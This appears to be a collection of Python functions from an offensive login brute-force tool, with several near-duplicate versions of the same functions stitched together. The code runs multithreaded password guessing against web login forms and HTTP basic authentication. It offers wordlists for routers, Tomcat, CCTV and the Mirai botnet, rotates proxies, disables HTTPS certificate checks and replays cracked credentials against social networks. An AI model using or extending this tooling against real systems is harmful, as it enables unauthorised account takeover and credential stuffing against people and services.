def do_info(self, input): '''show info for selected module''' if not g.current_module: return print("-"*64) utils.pprint_dict_in_order(g.current_module.__info__, ("name", "description")) print("\nOptions: ") opts = g.current_module.options utils.print_table(["Name", "Value", "Description"], *g.current_module.get_opts(*opts))
def run(options, creds): social_urls = data.social_urls().replace("\t", "").split("\n") for url in social_urls: if options.url in url: social_urls.remove(url) result = Queue() #workers = [] try: for tryCreds in creds: for url in social_urls: submit(url, options, tryCreds, result) # if len(workers) == options.threads: # do_job(workers) # del workers[:] # worker = threading.Thread( # target = submit, # args = (url, options, tryCreds, result) # ) #worker.daemon = True #workers.append(worker) #do_job(workers) #del workers[:] except KeyboardInterrupt: printf("[x] Terminated by user!", "bad") import os os._exit(0) except SystemExit: die("[x] Terminated by system!", "SystemExit") except Exception as err: die("[x] ReAuth: Runtime error", err) finally: result = list(result.queue) if len(result) == 0: printf("[-] No extra valid password found", "bad") else: print_table(("Target", "Username", "Password"), *result)
def print_help(): # Print project's help table print_fast_help() print("\nOptions:\n") title = ("Formats", "Examples") menu = [[ "%-25s" % ("-u <path_to_wordlist>"), "-u /usr/share/wordlists/nmap.lst" ], [ "%-25s" % ("-p <path_to_wordlist>"), "-p /usr/share/wordlists/fasttrack.txt" ], [ "%-25s" % ("-U <username>"), "-U admin | -U admin:user1 | -U admin,root,user" ], ["%-25s" % ("-t <threads>"), "-t 32"], ["%-25s" % ("-k <false_key>"), "-k 'Invalid username'"]] utils.print_table(title, *menu) print("\nModes:\n") title = ("Attack Modes", "Ony ONE attack mode can be used") menu = [ ["%-25s" % ("--brute [Default]"), "Brute Forcing credentials"], ["%-25s" % ("--httpget"), "HTTP GET Basic Authentication"], [ "%-25s" % ("--reauth"), "Checks valid credentials on other social-networks" ], ["%-25s" % ("--sqli [Not Available]"), "SQL Injection bypassing"], ] utils.print_table(title, *menu) print("") title = ("Running Modes", "Descriptions") menu = [ ["%-25s" % ("--proxy"), "Use Proxy each connection"], ["%-25s" % ("--verbose"), "Display more information"], [ "%-25s" % ("--getproxy"), "Get proxy list [Auto check connect to target]" ], ] utils.print_table(title, *menu) print("\nWordlists:\n") title = ("Values", "Informations") menu = [ ["%-25s" % ("default"), "Top usernames+passwords"], ["%-25s" % ("router"), "Default router usernames+passwords"], ["%-25s" % ("tomcat"), "Default tomcat usernames+passwords"], ["%-25s" % ("cctv"), "Default cctv usernames+passwords"], ["%-25s" % ("unix"), "Top unix usernames+passwords"], ["%-25s" % ("http"), "Top http usernames+passwords"], ["%-25s" % ("mirai"), "List usernames+passwords used by mirai botnet"], ["%-25s" % ("webshell"), "Common webshell usernames+passwords"], ] utils.print_table(title, *menu) print("")
def run(checkedURL, creds, optionThreads, optionProxy, optionVerbose): social_urls = data.social_urls().replace("\t", "").split("\n") for url in social_urls: # BUG double_free() if checkedURL in url: social_urls.remove(url) result = Queue() workers = [] try: for tryCreds in creds: for url in social_urls: if actions.size_o(workers) == optionThreads: do_job(workers) del workers[:] worker = threading.Thread(target=submit, args=(url, tryCreds, optionProxy, optionVerbose, result)) worker.daemon = True workers.append(worker) do_job(workers) del workers[:] except KeyboardInterrupt: utils.die("[x] Terminated by user!", "KeyboardInterrupt") except SystemExit: utils.die("[x] Terminated by system!", "SystemExit") except Exception as err: utils.die("[x] ReAuth: Runtime error", err) finally: result = list(result.queue) if actions.size_o(result) == 0: utils.printf("[-] No extra valid password found", "bad") else: utils.print_table(("Target", "Username", "Password"), *result)
def print_help(): # Print project's help table print_fast_help() print("Options: ") title = ("Formats", "Examples") menu = [ ["%-14s" % ("-u <file_path>"), "-u /opt/wordlists/nmap.lst"], ["%-14s" % ("-p <file_path>"), "-p /opt/wordlists/passwd.txt"], ["%-14s" % ("-U <username>"), "-U admin | -U admin:user1"], ["%-14s" % ("-t <threads>"), "-t 32"], ["%-14s" % ("-T <timeout>"), "-t 25"], ["%-14s" % ("-l <file_path>"), "-l url_list.txt"], ] print_table(title, *menu) print("\nRunning mode:") title = ("Modes", "Descriptions") menu = [ ["%-14s" % ("--proxy"), "Attack using proxies"], ["%-14s" % ("--verbose"), "Display running information"], ] print_table(title, *menu) print("\nExtra modes: Combines with attack mode") title = ("Modes", "Descriptions") menu = [ ["%-14s" % ("--reauth"), "Check credentials on social networks"], ["%-14s" % ("--getproxy"), "Provide new proxy list"], ] print_table(title, *menu) print("\nWordlists: Values will be replaced by [-U/-u/-p] options") title = ("List name", "Descriptions") menu = [ ["%-14s" % ("default"), "Top common users+passwords"], ["%-14s" % ("router"), "Router wordlist"], ["%-14s" % ("tomcat"), "Tomcat manager wordlist"], ["%-14s" % ("cctv"), "CCTV wordlist"], ["%-14s" % ("unix"), "Top Unix wordlist"], ["%-14s" % ("http"), "Top HTTP wordlist"], ["%-14s" % ("mirai"), "Mirai botnet wordlist"], ["%-14s" % ("webshell"), "Webshell wordlist"], ["%-14s" % ("sqli"), "Dynamic SQLi payloads"], ] print_table(title, *menu) print("")
def attack(options, loginInfo): def run_threads(threads, sending, completed, total): # Run threads for thread in threads: sending += 1 # Sending progress_bar(sending, completed, total) thread.start() # Wait for threads completed for thread in threads: completed += 1 progress_bar(sending, completed, total) thread.join() return sending, completed ### SETTING UP FOR NEW ATTACK ### if options.attack_mode == "--httpget": from modules import httpget attack_module = httpget.submit elif options.attack_mode == "--loginbrute": from modules import loginbrute attack_module = loginbrute.submit else: die("[x] Runtime error: Invalid attack mode", "%s" % (options.attack_mode)) if not loginInfo: # Test for 2 steps... login? die("[x] Target check: URL error", "[x] No login request found") else: if options.verbose: printf("[*] Login request has been found!", "good") tasks = len(options.passwd) * len(options.username) printf( "[+] [Tasks: %s] [ID: %s] [Controls: %s]" % (tasks, loginInfo[0], loginInfo[1][::-1]), "good") import Queue result = Queue.Queue() sending, completed = 0, 0 try: #### START ATTACK #### workers = [] for username in options.username: if "--upwd" in options.extras \ and username not in options.passwd \ and options.options["-p"] is not "sqli": options.passwd += (username, ) for password in options.passwd: if len(workers) == options.threads: sending, completed = run_threads(workers, sending, completed, tasks) del workers[:] worker = threading.Thread(target=attack_module, args=(options, loginInfo, [password, username], result)) workers.append(worker) worker.daemon = True sending, completed = run_threads(workers, sending, completed, tasks) del workers[:] except KeyboardInterrupt: printf("[x] Terminated by user!", "bad") global set_break set_break = True except SystemExit: printf("[x] Terminated by system!", "bad") except Exception as error: die("[x] Runtime error", error) finally: credentials = list(result.queue) if len(credentials) == 0: printf("[-] No match found!", "bad") else: printf("\n[*] %s valid password[s] found:" % (len(credentials)), "norm") if not credentials[0][1]: print_table(("URL", "Password"), *[creds[::2] for creds in credentials]) else: print_table(("Username", "Password"), *[creds[-2:] for creds in credentials]) printf("") return credentials
if loginInfo: check_options(options, loginInfo) result = attack(options, loginInfo) if result: for _result in result: results.append(_result) #results.append(result) if "--reauth" in options.extras: from extras import reauth reauth.run(options, result) except Exception as error: die("[x] Program stopped", error) finally: runtime = time.time() - runtime try: if len(options.target) > 0: if len(results) > 0 and len(options.target) > 1: printf("[*] Cracked %s target[s]" % (len(results)), "norm") print_table(("URL", "Username", "Password"), *results) else: printf("[x] No target has been cracked", "bad") except: pass printf( "\n[*] [Elapsed: %0.2f] [%s]" % ( runtime, time.strftime("%Y-%m-%d %H:%M"), ), "good")
def main(optionURL, setOptions, optionRunMode, setRunOptions): def do_job(jobs): for job in jobs: job.start() utils.printp for job in jobs: job.join() import time, os, threading # CHECK IMPORTING ALL LIBS. IMPORT HERE -> CALL HELP_BANNER ONLY FASTER try: import mechanize, re, requests # for basichttpauthentication, not useless, use later except ImportError as err: utils.die(err, "Try: pip install %s" % (str(err).split(" ")[-1])) try: _create_unverified_https_context = ssl._create_unverified_context except AttributeError: # Legacy Python that doesn't verify HTTPS certificates by default pass else: # Handle target environment that doesn't support HTTPS verification ssl._create_default_https_context = _create_unverified_https_context try: from Queue import Queue except ImportError: from queue import Queue result = Queue() # BUG bad memory management optionUserlist, optionThreads, optionKeyFalse, optionPasslist = setOptions.values( ) optionProxy, optionReport, optionVerbose = setRunOptions.values() try: optionUserlist = optionUserlist.split("\n") except: pass try: optionPasslist = optionPasslist.split("\n") except: pass ## End of testing timeStarting = time.time() # get login form info # call brute IS_REGULAR = True # IF NOT HTTP BASIC AUTHENTICATION, CHECK RESULT AND PARSE LOGIN FORM proc = tbrowser.startBrowser() proc.addheaders = [('User-Agent', tbrowser.useragent())] if optionRunMode not in ["--httpauth"]: try: utils.printf("Checking connection...") proc.open(optionURL) #TODO PROXY utils.printf("[*] Connect success!", "good") loginInfo = tbrowser.parseLoginForm(proc.forms()) if not loginInfo: utils.die("[x] URL error", "No login field found") elif actions.size_o(loginInfo[1]) == 1: # Password checking only utils.printf("[*] Form with password field", "good") del optionUserlist[:] optionUserlist = [""] IS_REGULAR = False elif actions.size_o(loginInfo[1]) == 2: utils.printf("[*] Form username+password field", "good") except Exception as err: utils.die("[x] Can't connect to target", err) finally: proc.close() #### END OF CHECKING TARGET sizePasslist = actions.size_o(optionPasslist) sizeUserlist = actions.size_o(optionUserlist) workers = [] utils.printf("Starting attack....\nTask count: %s tasks" % (sizeUserlist * sizePasslist)) ############################ # Setting up threads ############################ try: for password in optionPasslist: for username in optionUserlist: username, password = username.replace("\n", ""), password.replace( "\n", "") #### # IF HAVE ENOUGH THREAD, DO IT ALL ### if actions.size_o(workers) == optionThreads: do_job(workers) del workers[:] if optionRunMode == "--brute": worker = threading.Thread( target=loginbrute.submit, args=(optionURL, [password, username ], optionProxy, optionKeyFalse, optionVerbose, loginInfo, result)) elif optionRunMode == "--httpauth": worker = threading.Thread(target=httpauth.submit, args=(optionURL, username, password, optionProxy, optionVerbose, result)) worker.daemon = True workers.append(worker) ######### END SETTING UP THREADS ################ #DO ALL LAST TASKs do_job(workers) del workers[:] ### CATCH ERRORS ### except KeyboardInterrupt: # as error: # TODO: kill running threads here utils.die("[x] Terminated by user!", "KeyboardInterrupt") except SystemExit: # as error utils.die("[x] Terminated by system!", "SystemExit") except Exception as error: utils.die("[x] Runtime error", error) ### ALL TASKS DONE #### finally: runtime = time.time() - timeStarting """ All threads have been set daemon Running threads should be stopped after main task done """ ############################################ # Get result # ############################################ try: credentials = list(result.queue) if actions.size_o(credentials) == 0: utils.printf("[-] No match found!", "bad") else: utils.printf( "\n[*] %s valid password[s] found:\n" % (actions.size_o(credentials)), "norm") if IS_REGULAR: utils.print_table(("Username", "Password"), *credentials) else: if optionRunMode != "--sqli": utils.print_table(("", "Password"), *credentials) else: utils.print_table(("Payload", ""), *credentials) # TODO: test more ### CREATE REPORT #### if optionReport: try: import reports optionProxy = "True" if optionProxy else "False" report_name = "%s_%s" % (time.strftime("%Y.%m.%d_%H.%M"), optionURL.split("/")[2]) report_path = "%s/%s.txt" % (reports.__path__[0], report_name) reports.makeReport( utils.report_banner(optionURL, optionRunMode, optionProxy, optionThreads, credentials, report_name, runtime, IS_REGULAR), report_path) utils.printf("\n[*] Report file at:\n%s" % (report_path), "good") except Exception as err: utils.printf("[x] Error while creating report: %s" % (err), "bad") except Exception as err: utils.printf("\n[x] Error while getting result.\n", "bad") utils.printf(err, "bad") utils.printf("\n[*] Time elapsed: %0.5s [s]\n" % (runtime), "good") sys.exit(0)
def main(optionURL, setOptions, optionRunMode, setRunOptions): def do_job(jobs): for job in jobs: job.start() for job in jobs: job.join() import time, os, threading # CHECK IMPORTING ALL LIBS. IMPORT HERE -> CALL HELP_BANNER ONLY FASTER try: import mechanize, re, ssl, requests # for basichttpauthentication, not useless, use later except ImportError as err: utils.die(err, "Try: pip install %s" % (str(err).split(" ")[-1])) try: _create_unverified_https_context = ssl._create_unverified_context except AttributeError: # Legacy Python that doesn't verify HTTPS certificates by default pass else: # Handle target environment that doesn't support HTTPS verification ssl._create_default_https_context = _create_unverified_https_context try: from Queue import Queue except ImportError: from queue import Queue result = Queue() # BUG bad memory management optionUserlist, optionThreads, optionKeyFalse, optionPasslist = setOptions.values( ) optionProxy, optionReport, optionVerbose = setRunOptions.values() try: optionUserlist = optionUserlist.split("\n") except: #optionUserlist = optionUserlist.readlines() pass # TODO Must testing cases with list and file object try: optionPasslist = optionPasslist.split("\n") except: pass ## End of testing timeStarting = time.time() # get login form info # call brute sizePasslist = actions.size_o(optionPasslist) sizeUserlist = actions.size_o(optionUserlist) proc = tbrowser.startBrowser() proc.addheaders = [('User-Agent', tbrowser.useragent())] try: utils.printf("Checking connection...") proc.open(optionURL) #TODO PROXY loginInfo = tbrowser.getLoginForm(optionURL, proc, optionVerbose) utils.printf("Connect success!", "good") except Exception as err: utils.die("Error while parsing login form", err) finally: proc.close() utils.printf("Starting attack.... %s tasks" % (sizeUserlist * sizePasslist)) workers = [] trying = 0 try: for password in optionPasslist: for username in optionUserlist: if len(workers) == optionThreads: do_job(workers) del workers[:] if optionRunMode == "--brute": worker = threading.Thread( target=loginbrute.submit, args=(optionURL, username.replace("\n", ""), password.replace("\n", ""), sizeUserlist * sizePasslist, optionProxy, optionKeyFalse, optionVerbose, loginInfo, result)) worker.daemon = True workers.append(worker) #DO ALL LAST TASKs do_job(workers) del workers[:] except KeyboardInterrupt: # as error: # TODO: kill running threads here utils.die("Terminated by user!", "KeyboardInterrupt") except SystemExit: # as error utils.die("Terminated by system!", "SystemExit") except Exception as error: utils.die("Error while running", error) finally: runtime = time.time() - timeStarting """ All threads have been set daemon Running threads should be stopped after main task done """ ############################################ # Get result # ############################################ try: credentials = list(result.queue) if len(credentials) == 0: utils.printf("[-] No valid password found!", "bad") else: utils.printf( "\n[*] %s valid password[s] found:\n" % (len(credentials)), "norm") utils.print_table(("Username", "Password"), *credentials) if optionReport: try: import report optionProxy = "True" if optionProxy else "False" report_name = "%s_%s" % (time.strftime("%Y.%m.%d_%H.%M"), optionURL.split("/")[2]) report_path = "%s/%s.txt" % (reports.__path__[0], report_name) reports.makeReport( utils.report_banner(optionURL, optionRunMode, optionProxy, optionThreads, credentials, report_name, runtime), report_path) utils.printf("\n[*]Report file at:\n%s" % (report_path), "good") except Exception as err: utils.printf("Error while creating report: %s" % (err), "bad") except Exception as err: utils.printf("\nError while getting result.\n", "bad") utils.printf(err, "bad") utils.printf("\nCompleted. Run time: %0.5s [s]\n" % (runtime)) ######################################## # Clear resources # ######################################## try: optionPasslist.close() except: pass try: optionUserlist.close() except: pass sys.exit(0)